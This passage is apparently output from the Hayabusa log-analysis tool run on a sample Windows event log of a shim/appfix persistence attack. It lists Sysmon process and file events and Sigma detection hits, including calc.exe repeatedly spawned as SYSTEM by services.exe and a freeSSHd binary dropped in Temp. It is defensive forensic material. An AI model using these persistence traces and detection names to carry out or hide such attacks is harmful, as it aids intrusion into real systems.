LID: 0x39e47fa | PID: 3748 | PGUID: 365ABB72-29B4-5C91-0000-0010289AC308,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logoff | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x39e47fa | PID: 3488 | 
PGUID: 365ABB72-29B4-5C91-0000-0010999AC308,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x1 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 2384 | PGUID: 365ABB72-29B5-5C91-0000-0010BE04C408",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe C:\Windows\system32\CompatTelRunner.exe | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 4012 | PGUID: 365ABB72-29ED-5C91-0000-00107271E808,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 360 | PGUID: 365ABB72-528C-5C91-0000-00104B4B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | 
Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 368 | PGUID: 365ABB72-528C-5C91-0000-0010644D0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 408 | PGUID: 365ABB72-528D-5C91-0000-00103B500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 416 | PGUID: 365ABB72-528D-5C91-0000-001056500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 428 | PGUID: 365ABB72-528D-5C91-0000-00109C500000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: 
C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 484 | PGUID: 365ABB72-528D-5C91-0000-001062560000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 500 | PGUID: 365ABB72-528D-5C91-0000-0010AD570000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsm.exe | Process: C:\Windows\System32\lsm.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 508 | PGUID: 365ABB72-528D-5C91-0000-0010DA570000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 516 | PGUID: 365ABB72-528D-5C91-0000-00100C580000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 632 | PGUID: 
365ABB72-528F-5C91-0000-001073780000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\VBoxService.exe | Process: C:\Windows\System32\VBoxService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 692 | PGUID: 365ABB72-528F-5C91-0000-0010ECB50000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 876 | PGUID: 365ABB72-528F-5C91-0000-00106BBE0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1012 | PGUID: 365ABB72-5290-5C91-0000-001033D00000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1136 | PGUID: 
365ABB72-5290-5C91-0000-00104C100100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.563 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Tasks\SA.DAT | Process: C:\Windows\system32\svchost.exe | PID: 1036 | PGUID: 365ABB72-5290-5C91-0000-0010E6D10000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1416 | PGUID: 365ABB72-5292-5C91-0000-00101E310100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1532 | PGUID: 365ABB72-5292-5C91-0000-001036480100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Startup | Process: C:\Windows\System32\gpscript.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x3e7 | PID: 1616 | PGUID: 
365ABB72-52A4-5C91-0000-0010A8560100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1628 | PGUID: 365ABB72-52B4-5C91-0000-0010355B0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-52B4-5C91-0000-0010D55B0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1676 | PGUID: 
365ABB72-52B4-5C91-0000-0010C25D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1788 | PGUID: 365ABB72-52CE-5C91-0000-00106F720100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-52CE-5C91-0000-00109D740100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.454 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Temp\wodCmdTerm.exe | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | PID: 1788 | PGUID: 
365ABB72-52CE-5C91-0000-00106F720100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1948 | PGUID: 365ABB72-52EC-5C91-0000-001027860100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 304 | PGUID: 365ABB72-5310-5C91-0000-001096A90100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 432 | PGUID: 
365ABB72-532B-5C91-0000-00100EB40100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 580 | PGUID: 365ABB72-5344-5C91-0000-001032BC0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1156 | PGUID: 365ABB72-5345-5C91-0000-001019C40100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1280 | PGUID: 
365ABB72-5366-5C91-0000-00109FCD0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1472 | PGUID: 365ABB72-5384-5C91-0000-0010F5D70100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1564 | PGUID: 365ABB72-53A2-5C91-0000-00101FE20100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1744 | PGUID: 
365ABB72-53A2-5C91-0000-001093E70100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1600 | PGUID: 365ABB72-53C0-5C91-0000-001044FC0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1904 | PGUID: 365ABB72-53DE-5C91-0000-00105C050200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1980 | PGUID: 
365ABB72-53DE-5C91-0000-00104D160200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\UI0Detect.exe | Process: C:\Windows\System32\UI0Detect.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2040 | PGUID: 365ABB72-53DF-5C91-0000-0010452D0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe SYSTEM | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2464 | PGUID: 365ABB72-53F2-5C91-0000-001081FE0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""taskhost.exe"" | Process: C:\Windows\System32\taskhost.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x33435 | PID: 2640 | PGUID: 365ABB72-5418-5C91-0000-001089390300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2684 | PGUID: 365ABB72-5418-5C91-0000-0010BF400300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,info,,Process 
Created,"Cmd: ""C:\Windows\system32\slui.exe"" | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2692 | PGUID: 365ABB72-5418-5C91-0000-001076420300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x33435 | PID: 2756 | PGUID: 365ABB72-5418-5C91-0000-0010784B0300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logon | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x33435 | PID: 2948 | PGUID: 365ABB72-543D-5C91-0000-00102FA20300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2960 | PGUID: 365ABB72-543D-5C91-0000-001099A30300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x33435 | PID: 2984 | PGUID: 
